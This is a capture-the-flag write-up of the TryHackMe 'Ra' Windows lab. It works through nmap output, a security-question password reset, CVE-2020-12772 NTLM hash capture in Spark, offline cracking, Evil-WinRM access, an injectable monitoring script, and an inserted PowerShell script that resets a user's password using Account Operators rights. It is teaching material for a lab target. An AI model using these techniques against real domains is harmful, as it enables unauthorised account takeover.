TryHackMe Ra Writeup

Welcome back to another TryHackMe Windows box writeup. Today's box is called Ra, created by 4ndr34zz.

Machine Name: Ra
Difficulty: Hard
Created By: 4ndr34zz

Released On: 03rd July 2020
Machine Link: https://tryhackme.com/room/ra

This Windows box is all about abusing a weak password-reset flow on the company web site to obtain a user's credentials, using them to get into SMB, and then pivoting through WindCorp's internal network until we own the Administrator account. There are three flags to capture, so let us get down to business.


Enumeration

As always, once the machine has booted and an IP address has been allocated to me, I add it to my hosts file as ra.thm and start off with an nmap scan.

root@nav1n:~/thm/ra # nmap -sS -T4 -A -v ra.thm 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-31 14:25 +03
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:25
Completed NSE at 14:25, 0.00s elapsed
Initiating NSE at 14:25
Completed NSE at 14:25, 0.00s elapsed
Initiating NSE at 14:25
Completed NSE at 14:25, 0.00s elapsed
Initiating Ping Scan at 14:25
Scanning ra.thm (10.10.204.174) [4 ports]
Completed Ping Scan at 14:25, 0.17s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 14:25
Scanning ra.thm (10.10.204.174) [1000 ports]
Discovered open port 80/tcp on 10.10.204.174
Discovered open port 3389/tcp on 10.10.204.174
Discovered open port 139/tcp on 10.10.204.174
Discovered open port 443/tcp on 10.10.204.174
Discovered open port 135/tcp on 10.10.204.174
Discovered open port 445/tcp on 10.10.204.174
Discovered open port 53/tcp on 10.10.204.174
Discovered open port 7070/tcp on 10.10.204.174
Discovered open port 464/tcp on 10.10.204.174
Discovered open port 5222/tcp on 10.10.204.174
Discovered open port 3269/tcp on 10.10.204.174
Discovered open port 9090/tcp on 10.10.204.174
Discovered open port 3268/tcp on 10.10.204.174
Discovered open port 9091/tcp on 10.10.204.174
Discovered open port 5269/tcp on 10.10.204.174
Discovered open port 636/tcp on 10.10.204.174
Discovered open port 7777/tcp on 10.10.204.174
Discovered open port 2179/tcp on 10.10.204.174
Discovered open port 593/tcp on 10.10.204.174
Discovered open port 7443/tcp on 10.10.204.174
Discovered open port 88/tcp on 10.10.204.174
Discovered open port 389/tcp on 10.10.204.174
Completed SYN Stealth Scan at 14:25, 6.19s elapsed (1000 total ports)
.....snip......
Completed NSE at 14:30, 133.80s elapsed
Initiating NSE at 14:30
Completed NSE at 14:30, 0.00s elapsed
Nmap scan report for ra.thm (10.10.204.174)
Host is up (0.14s latency).
Not shown: 978 filtered ports
PORT     STATE SERVICE             VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http                Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Windcorp.
88/tcp   open  kerberos-sec        Microsoft Windows Kerberos (server time: 2020-07-31 11:25:14Z)
135/tcp  open  msrpc               Microsoft Windows RPC
139/tcp  open  netbios-ssn         Microsoft Windows netbios-ssn
389/tcp  open  ldap                Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
443/tcp  open  ssl/http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|   Negotiate
|_  NTLM
| http-methods: 
|_  Supported Methods: OPTIONS
| http-ntlm-info: 
|   Target_Name: WINDCORP
|   NetBIOS_Domain_Name: WINDCORP
|   NetBIOS_Computer_Name: FIRE
|   DNS_Domain_Name: windcorp.thm
|   DNS_Computer_Name: Fire.windcorp.thm
|   DNS_Tree_Name: windcorp.thm
|_  Product_Version: 10.0.17763
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
| ssl-cert: Subject: commonName=Windows Admin Center
| Subject Alternative Name: DNS:WIN-2FAA40QQ70B
| Issuer: commonName=Windows Admin Center
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha512WithRSAEncryption
| Not valid before: 2020-04-30T14:41:03
| Not valid after:  2020-06-30T14:41:02
| MD5:   31ef ecc2 3c93 81b1 67cf 3015 a99f 1726
|_SHA-1: ef2b ac66 5e99 dae7 1182 73a1 93e8 a0b7 c772 f49c
|_ssl-date: 2020-07-31T11:28:20+00:00; 0s from scanner time.
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2179/tcp open  vmrdp?
3268/tcp open  ldap                Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server       Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: WINDCORP
|   NetBIOS_Domain_Name: WINDCORP
|   NetBIOS_Computer_Name: FIRE
|   DNS_Domain_Name: windcorp.thm
|   DNS_Computer_Name: Fire.windcorp.thm
|   DNS_Tree_Name: windcorp.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2020-07-31T11:27:41+00:00
| ssl-cert: Subject: commonName=Fire.windcorp.thm
| Issuer: commonName=Fire.windcorp.thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-04-30T06:40:02
| Not valid after:  2020-10-30T06:40:02
| MD5:   f21f 5e9b a220 8222 4c2b 8d71 ba6a c71f
|_SHA-1: 22ba c300 f70a 30a4 da1e ebcd 299b f94a aca4 c52c
|_ssl-date: 2020-07-31T11:28:20+00:00; 0s from scanner time.
5222/tcp open  jabber
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     capabilities: 
| 
|     xmpp: 
|       version: 1.0
|     unknown: 
| 
|     features: 
| 
|     auth_mechanisms: 
| 
|     errors: 
|       invalid-namespace
|       (timeout)
|     compression_methods: 
| 
|_    stream_id: 1ofp5ejn9v
5269/tcp open  xmpp                Wildfire XMPP Client
| xmpp-info: 
|   Respects server name
|   STARTTLS Failed
|   info: 
|     capabilities: 
| 
|     xmpp: 
|       version: 1.0
|     unknown: 
| 
|     features: 
| 
|     auth_mechanisms: 
| 
|     errors: 
|       host-unknown
|       (timeout)
|     compression_methods: 
| 
|_    stream_id: 9tznirp0tg
7070/tcp open  http                Jetty 9.4.18.v20190429
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
7443/tcp open  ssl/http            Jetty 9.4.18.v20190429
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Issuer: commonName=fire.windcorp.thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-01T08:39:00
| Not valid after:  2025-04-30T08:39:00
| MD5:   b715 5425 83f3 a20f 75c8 ca2d 3353 cbb7
|_SHA-1: 97f7 0772 a26b e324 7ed5 bbcb 5f35 7d74 7982 66ae
7777/tcp open  socks5              (No authentication; connection failed)
| socks-auth-info: 
|_  No authentication
9090/tcp open  zeus-admin?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Fri, 31 Jul 2020 11:25:14 GMT
|     Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 115
|     <html>
|     <head><title></title>
|     <meta http-equiv="refresh" content="0;URL=index.jsp">
|     </head>
|     <body>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Fri, 31 Jul 2020 11:25:21 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   JavaRMI, drda, ibm-db2-das, informix: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   SqueezeCenter_CLI: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   WMSRequest: 
|     HTTP/1.1 400 Illegal character CNTL=0x1
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
9091/tcp open  ssl/xmltec-xmlmail?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Fri, 31 Jul 2020 11:25:34 GMT
|     Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 115
|     <html>
|     <head><title></title>
|     <meta http-equiv="refresh" content="0;URL=index.jsp">
|     </head>
|     <body>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Fri, 31 Jul 2020 11:25:34 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 400 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Issuer: commonName=fire.windcorp.thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-01T08:39:00
| Not valid after:  2025-04-30T08:39:00
| MD5:   b715 5425 83f3 a20f 75c8 ca2d 3353 cbb7
|_SHA-1: 97f7 0772 a26b e324 7ed5 bbcb 5f35 7d74 7982 66ae
4 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port53-TCP:V=7.80%I=7%D=7/31%Time=5F23FF9F%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5222-TCP:V=7.80%I=7%D=7/31%Time=5F23FFAE%P=x86_64-pc-linux-gnu%r(RP
SF:CCheck,9B,"<stream:error\x20xmlns:stream=\"http://etherx\.jabber\.org/s
SF:treams\"><not-well-formed\x20xmlns=\"urn:ietf:params:xml:ns:xmpp-stream
SF:s\"/></stream:error></stream:stream>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port9090-TCP:V=7.80%I=7%D=7/31%Time=5F23FF9A%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,11D,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Fri,\x2031\x20Jul\x202
SF:020\x2011:25:14\x20GMT\r\nLast-Modified:\x20Fri,\x2031\x20Jan\x202020\x
SF:2017:54:10\x20GMT\r\nContent-Type:\x20text/html\r\nAccept-Ranges:\x20by
SF:tes\r\nContent-Length:\x20115\r\n\r\n<html>\n<head><title></title>\n<me
SF:ta\x20http-equiv=\"refresh\"\x20content=\"0;URL=index\.jsp\">\n</head>\
SF:n<body>\n</body>\n</html>\n\n")%r(JavaRMI,C3,"HTTP/1\.1\x20400\x20Illeg
SF:al\x20character\x20CNTL=0x0\r\nContent-Type:\x20text/html;charset=iso-8
SF:859-1\r\nContent-Length:\x2069\r\nConnection:\x20close\r\n\r\n<h1>Bad\x
SF:20Message\x20400</h1><pre>reason:\x20Illegal\x20character\x20CNTL=0x0</
SF:pre>")%r(WMSRequest,C3,"HTTP/1\.1\x20400\x20Illegal\x20character\x20CNT
SF:L=0x1\r\nContent-Type:\x20text/html;charset=iso-8859-1\r\nContent-Lengt
SF:h:\x2069\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</h1><
SF:pre>reason:\x20Illegal\x20character\x20CNTL=0x1</pre>")%r(ibm-db2-das,C
SF:3,"HTTP/1\.1\x20400\x20Illegal\x20character\x20CNTL=0x0\r\nContent-Type
SF::\x20text/html;charset=iso-8859-1\r\nContent-Length:\x2069\r\nConnectio
SF:n:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illega
SF:l\x20character\x20CNTL=0x0</pre>")%r(SqueezeCenter_CLI,9B,"HTTP/1\.1\x2
SF:0400\x20No\x20URI\r\nContent-Type:\x20text/html;charset=iso-8859-1\r\nC
SF:ontent-Length:\x2049\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\
SF:x20400</h1><pre>reason:\x20No\x20URI</pre>")%r(informix,C3,"HTTP/1\.1\x
SF:20400\x20Illegal\x20character\x20CNTL=0x0\r\nContent-Type:\x20text/html
SF:;charset=iso-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20close\r\
SF:n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\x20character
SF:\x20CNTL=0x0</pre>")%r(drda,C3,"HTTP/1\.1\x20400\x20Illegal\x20characte
SF:r\x20CNTL=0x0\r\nContent-Type:\x20text/html;charset=iso-8859-1\r\nConte
SF:nt-Length:\x2069\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\x204
SF:00</h1><pre>reason:\x20Illegal\x20character\x20CNTL=0x0</pre>")%r(HTTPO
SF:ptions,56,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Fri,\x2031\x20Jul\x202020
SF:\x2011:25:21\x20GMT\r\nAllow:\x20GET,HEAD,POST,OPTIONS\r\n\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port9091-TCP:V=7.80%T=SSL%I=7%D=7/31%Time=5F23FFAE%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,11D,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Fri,\x2031\x20Ju
SF:l\x202020\x2011:25:34\x20GMT\r\nLast-Modified:\x20Fri,\x2031\x20Jan\x20
SF:2020\x2017:54:10\x20GMT\r\nContent-Type:\x20text/html\r\nAccept-Ranges:
SF:\x20bytes\r\nContent-Length:\x20115\r\n\r\n<html>\n<head><title></title
SF:>\n<meta\x20http-equiv=\"refresh\"\x20content=\"0;URL=index\.jsp\">\n</
SF:head>\n<body>\n</body>\n</html>\n\n")%r(HTTPOptions,56,"HTTP/1\.1\x2020
SF:0\x20OK\r\nDate:\x20Fri,\x2031\x20Jul\x202020\x2011:25:34\x20GMT\r\nAll
SF:ow:\x20GET,HEAD,POST,OPTIONS\r\n\r\n")%r(RTSPRequest,AD,"HTTP/1\.1\x204
SF:00\x20Unknown\x20Version\r\nContent-Type:\x20text/html;charset=iso-8859
SF:-1\r\nContent-Length:\x2058\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20M
SF:essage\x20400</h1><pre>reason:\x20Unknown\x20Version</pre>")%r(RPCCheck
SF:,C7,"HTTP/1\.1\x20400\x20Illegal\x20character\x20OTEXT=0x80\r\nContent-
SF:Type:\x20text/html;charset=iso-8859-1\r\nContent-Length:\x2071\r\nConne
SF:ction:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Il
SF:legal\x20character\x20OTEXT=0x80</pre>")%r(DNSVersionBindReqTCP,C3,"HTT
SF:P/1\.1\x20400\x20Illegal\x20character\x20CNTL=0x0\r\nContent-Type:\x20t
SF:ext/html;charset=iso-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20
SF:close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\x20c
SF:haracter\x20CNTL=0x0</pre>")%r(DNSStatusRequestTCP,C3,"HTTP/1\.1\x20400
SF:\x20Illegal\x20character\x20CNTL=0x0\r\nContent-Type:\x20text/html;char
SF:set=iso-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20close\r\n\r\n
SF:<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\x20character\x20C
SF:NTL=0x0</pre>")%r(Help,9B,"HTTP/1\.1\x20400\x20No\x20URI\r\nContent-Typ
SF:e:\x20text/html;charset=iso-8859-1\r\nContent-Length:\x2049\r\nConnecti
SF:on:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20No\x2
SF:0URI</pre>")%r(SSLSessionReq,C5,"HTTP/1\.1\x20400\x20Illegal\x20charact
SF:er\x20CNTL=0x16\r\nContent-Type:\x20text/html;charset=iso-8859-1\r\nCon
SF:tent-Length:\x2070\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\x2
SF:0400</h1><pre>reason:\x20Illegal\x20character\x20CNTL=0x16</pre>");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=253 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: FIRE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-07-31T11:27:43
|_  start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   143.91 ms 10.11.0.1
2   143.96 ms ra.thm (10.10.204.174)

NSE: Script Post-scanning.
Initiating NSE at 14:30
Completed NSE at 14:30, 0.00s elapsed
Initiating NSE at 14:30
Completed NSE at 14:30, 0.00s elapsed
Initiating NSE at 14:30
Completed NSE at 14:30, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 334.05 seconds
           Raw packets sent: 2067 (94.632KB) | Rcvd: 54 (2.952KB)

The nmap scan reveals many open ports. From an initial look, the host is an Active Directory domain controller: DNS (53), Kerberos (88), LDAP/LDAPS (389/636, plus the global catalog on 3268/3269), SMB (445) and RDP (3389) are all listening, alongside an Openfire XMPP server (5222/5269, HTTP binding on 7070/7443, and what by default are Openfire's admin console ports 9090/9091) and Windows Admin Center on 443. The NTLM information leaked by the HTTP and RDP services gives me the domain and host names, which I add to my hosts file:

Target_Name: WINDCORP
NetBIOS_Domain_Name: WINDCORP
NetBIOS_Computer_Name: FIRE
DNS_Domain_Name: windcorp.thm
DNS_Computer_Name: Fire.windcorp.thm
DNS_Tree_Name: windcorp.thm
Product_Version: 10.0.17763

Webserver

Port 80 hosts a Microsoft IIS 10.0 web server. Browsing to http://ra.thm opens the company portal.

The website has a password-reset link and, more interestingly, a list of IT support staff with their e-mail addresses. I was fairly sure this would matter for the foothold, so I saved the usernames and e-mail addresses into two files, users.txt and emails.txt. There is also a link to an IM client called "Spark", which could be another hint towards a foothold.

Resetting The User’s Password

As noticed initially, there is a link to reset an internal user's password, but we have to answer a security question to do so.

Going through the page, I noticed a section where the company highlights three employees, one of them a staff member called "Lily Levesque" pictured with a pet. Her tagline says, "I love being able to bring my best friend to work with me!". I recalled that the password-reset form offers the security question "What is/was your favorite pets name?".

A quick look at Lily's picture showed the image file name "lilyleAndSparky.jpg", which suggests the pet in Lily's arms is called "Sparky" and that her username is lilyle. Let us try our luck and reset Lily's password.

I tried the pet's name taken from the image file name and successfully changed Lily's password.

Awesome, I now have working credentials for one of the staff, so I can eventually get into the company's network. However, Lily is not IT staff, so she should have fewer privileges on the domain. Looking at the services returned by the nmap scan, I noticed SMB is running.

So as the next step I ran smbmap with Lily's credentials. The following shares were listed, but Lily has read-only access to all of them.

Reading through the files in the different directories, I found "Flag1.txt" in the Shared folder and used smbclient to download it.

Flag #1

Going through the other files in the same folder, I noticed several "Spark" installers for different operating systems. The installer version is 2.8.3, and a quick search for a "Spark 2.8.3" exploit led me to a recent vulnerability, listed as CVE-2020-12772.

Spark 2.8.3 CVE-2020-12772 Vulnerability

A chat on the IM can include an IMG element with an SRC attribute referencing an external host’s IP address. Upon access to this external host, the (NT)LM hashes of the user are sent with the HTTP request. This allows an attacker to collect these hashes, crack them, and potentially compromise the computer. (ROAR can be configured for automatic access. Also, access can occur if the user clicks.)

To use the exploit I need to run the vulnerable version of Spark locally, so I downloaded the .deb installer and installed it on my Kali box. After installation I ran Spark with Lilyle's credentials, but I kept getting a "certificate error".

I found the option to skip certificate verification in the Advanced menu and successfully logged in as Lilyle.

After spending some time on it, I found a GitHub repository where the Ra machine's author had put up an article showing how to trigger the exploit from the image placeholder.

After a few attempts I finally captured the NTLM hash of the user Buse, an IT support user. What actually arrives at the listener is the Net-NTLMv2 challenge-response from the HTTP authentication, not the stored NT hash, so it cannot be replayed with pass-the-hash, but it can be cracked offline.

I copied the captured response to a text file and cracked it with John (netntlmv2 format).

Getting The System Access

With valid credentials for the user Buse, I used Evil-WinRM to log in to the system and get a PowerShell shell.

Flag #2

Checking Buse's privileges, I found that Buse is a member of "BUILTIN\Account Operators". That group can create and modify users and groups in the domain and reset their passwords, but not for accounts that are members of protected groups such as Administrators or Domain Admins, so the question becomes which standard user is worth taking over.

IT Group members

*Evil-WinRM* PS C:\Users\buse\Documents> Get-ADGroupMember -Identity "IT" | select name

name             
----             
Ruby Woods       
Shelly Webb      
Edward Lewis     
Yolanda Fernandez
Carla Meyer      
Edeltraut Daub   
Britney Palmer   
Buse Candan      
Hemmo Boschma    
Emile Lavoie     
Léia Araújo      
Luis Lowe        
آریا احمدی       
Jaqueline Dittmer
بردیا کریمی      
Toivo Kuusisto   
Emilie Henry     
Mary George      
Jackson Vasquez  
Emily Anderson   
Wilmer Røren     
Antonietta Vidal 
Isra Saur        
Isabella Hughes  

Privilege Escalation

Going further, I found a couple of directories and a text file, but none of them seemed useful. Enumerating the file system, I found a directory C:\scripts\ with a PowerShell script called "checkservers.ps1". I tried to run the script but got "access denied".

The CheckServers.ps1 Script

The script:

# reset the lists of hosts prior to looping 
$OutageHosts = $Null 
# specify the time you want email notifications resent for hosts that are down 
$EmailTimeOut = 30 
# specify the time you want to cycle through your host lists. 
$SleepTimeOut = 45 
# specify the maximum hosts that can be down before the script is aborted 
$MaxOutageCount = 10 
# specify who gets notified 
$notificationto = "brittanycr@windcorp.thm" 
# specify where the notifications come from 
$notificationfrom = "admin@windcorp.thm" 
# specify the SMTP server 
$smtpserver = "relay.windcorp.thm" 
 
# start looping here 
Do{ 
$available = $Null 
$notavailable = $Null 
Write-Host (Get-Date) 
 
# Read the File with the Hosts every cycle, this way to can add/remove hosts 
# from the list without touching the script/scheduled task,  
# also hash/comment (#) out any hosts that are going for maintenance or are down. 
get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |   
ForEach-Object { 
    $p = "Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue"
    Invoke-Expression $p 
if($p) 
    { 
     # if the Host is available then just write it to the screen 
     write-host "Available host ---> "$_ -BackgroundColor Green -ForegroundColor White 
     [Array]$available += $_ 
    } 
else 
    { 
     # If the host is unavailable, give a warning to screen 
     write-host "Unavailable host ------------> "$_ -BackgroundColor Magenta -ForegroundColor White 
     $p = Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue 
     if(!($p)) 
       { 
        # If the host is still unavailable for 4 full pings, write error and send email 
        write-host "Unavailable host ------------> "$_ -BackgroundColor Red -ForegroundColor White 
        [Array]$notavailable += $_ 
 
        if ($OutageHosts -ne $Null) 
            { 
                if (!$OutageHosts.ContainsKey($_)) 
                { 
                 # First time down add to the list and send email 
                 Write-Host "$_ Is not in the OutageHosts list, first time down" 
                 $OutageHosts.Add($_,(get-date)) 
                 $Now = Get-date 
                 $Body = "$_ has not responded for 5 pings at $Now" 
                 Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom ` 
                  -Subject "Host $_ is down" -SmtpServer $smtpserver 
                } 
                else 
                { 
                    # If the host is in the list do nothing for 1 hour and then remove from the list. 
                    Write-Host "$_ Is in the OutageHosts list" 
                    if (((Get-Date) - $OutageHosts.Item($_)).TotalMinutes -gt $EmailTimeOut) 
                    {$OutageHosts.Remove($_)} 
                } 
            } 
        else 
            { 
                # First time down create the list and send email 
                Write-Host "Adding $_ to OutageHosts." 
                $OutageHosts = @{$_=(get-date)} 
                $Body = "$_ has not responded for 5 pings at $Now"  
                Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom ` 
                 -Subject "Host $_ is down" -SmtpServer $smtpserver 
            }  
       } 
    } 
} 
# Report to screen the details 
$log = "Last run: $(Get-Date)"
write-host $log
Set-Content -Path C:\scripts\log.txt -Value $log
Write-Host "Available count:"$available.count 
Write-Host "Not available count:"$notavailable.count 
Write-Host "Not available hosts:" 
$OutageHosts 
Write-Host "" 
Write-Host "Sleeping $SleepTimeOut seconds" 
sleep $SleepTimeOut 
if ($OutageHosts.Count -gt $MaxOutageCount) 
{ 
    # If there are more than a certain number of host down in an hour abort the script. 
    $Exit = $True 
    $body = $OutageHosts | Out-String 
    Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom ` 
     -Subject "More than $MaxOutageCount Hosts down, monitoring aborted" -SmtpServer $smtpServer 
} 
} 
while ($Exit -ne $True) 

I downloaded the script to my local machine for a closer look. It reads a file from the profile of the user brittanycr, so I checked that account. The net user output below shows she is only a member of Domain Users, not Administrators, which means Buse's Account Operators rights should be enough to reset her password and pick up the third flag from her desktop.

*Evil-WinRM* PS C:\Users\buse\Documents> net user brittanycr
User name                    brittanycr
Full Name                    Brittany Cruz
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/3/2020 7:15:48 AM
Password expires             6/14/2020 7:15:48 AM
Password changeable          5/4/2020 7:15:48 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   5/3/2020 6:27:42 AM

Logon hours allowed          All

Local Group Memberships      
Global Group memberships     *Domain Users         
The command completed successfully.

*Evil-WinRM* PS C:\Users\buse\Documents> 

And I changed the password successfully.
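The reset command itself is not shown above. As an added example (these are not the author's commands and not part of the original post), this is how I would do it from the Evil-WinRM shell using the ActiveDirectory module that is present on a domain controller, with the checks a member of Account Operators should make first. The target name and the new password are placeholders.

```powershell
# Added example (not the author's commands): reset a domain user's password
# from the Evil-WinRM shell as a member of BUILTIN\Account Operators, with the
# checks I would want before doing it. Uses the ActiveDirectory module that is
# present on a domain controller. Target name and new password are placeholders.

$Target      = 'brittanycr'          # placeholder target account
$NewPassword = 'Sup3rS3cret!2020'    # placeholder, must satisfy the domain policy

Import-Module ActiveDirectory

# 1. Confirm the current token actually carries the group we are relying on.
$tokenGroups = (whoami /groups) -join "`n"
if ($tokenGroups -notmatch 'BUILTIN\\Account Operators') {
    throw 'Current user is not a member of Account Operators; the reset will be denied.'
}

# 2. Inspect the target first. Account Operators cannot touch members of the
#    protected groups (Administrators, Domain Admins, Account/Server/Print/Backup
#    Operators, ...). Those objects carry adminCount=1 and AdminSDHolder re-applies
#    their ACL, so a reset on them fails with Access Denied no matter what.
$before = Get-ADUser -Identity $Target -Properties adminCount, MemberOf, PasswordLastSet
if ($before.adminCount -eq 1) {
    throw "$Target is a protected account (adminCount=1); Account Operators cannot reset it."
}
$groups = ($before.MemberOf -join ', ') -replace '^$', '(primary group only)'
"Target: {0}  Groups: {1}" -f $before.SamAccountName, $groups

# 3. Reset (not change) the password: -Reset needs the right, not the old password.
$secure = ConvertTo-SecureString -String $NewPassword -AsPlainText -Force
Set-ADAccountPassword -Identity $Target -Reset -NewPassword $secure

# 4. Verify from the directory rather than trusting the absence of an error.
$after = Get-ADUser -Identity $Target -Properties PasswordLastSet
if ($after.PasswordLastSet -le $before.PasswordLastSet) {
    throw 'PasswordLastSet did not advance; the reset did not take effect.'
}
"Password for $Target reset at $($after.PasswordLastSet)"
```

Two things worth knowing before running it: the reset is logged on the domain controller as security event 4724 (an attempt was made to reset an account's password), so it is noisy in a monitored environment, and it gives you the account, not a shell; whatever service you log in to next still has to grant that account a logon right.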

After changing the password, I tried to log in as Brittany over WinRM, but it failed. WinRM only admits accounts that are local administrators or members of Remote Management Users, so a password reset alone does not give me a shell as Brittany. There is still more to do: either Brittany is not the right target, or Evil-WinRM is not the way to the third flag.

